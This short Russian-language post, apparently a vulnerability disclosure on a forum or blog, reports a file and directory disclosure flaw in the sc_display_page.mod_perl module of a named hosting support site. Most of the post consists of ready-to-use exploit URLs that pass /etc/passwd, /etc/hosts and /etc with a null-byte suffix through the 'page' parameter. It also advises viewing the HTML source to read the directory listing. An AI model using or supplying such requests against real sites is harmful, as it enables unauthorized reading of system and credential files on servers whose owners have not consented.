Мною обнаружена уязвимость на сайте http://supportcenter.hosting.com/.
В модуле sc_display_page.mod_perl возможен просмотр файлов файлов и каталогов. 

http://supportcenter.hosting.com/ sc_display_page.mod_perl?page=/etc/passwd%00 
http://supportcenter.hosting.com/ sc_display_page.mod_perl?page=/etc/hosts%00 

Просмотр каталогов возможен даже в браузере. 

http://supportcenter.hosting.com/sc_display_page.mod_perl?page=/etc%00

открывается чистая страница, поэтому смотрим html-код.

Оставить мнение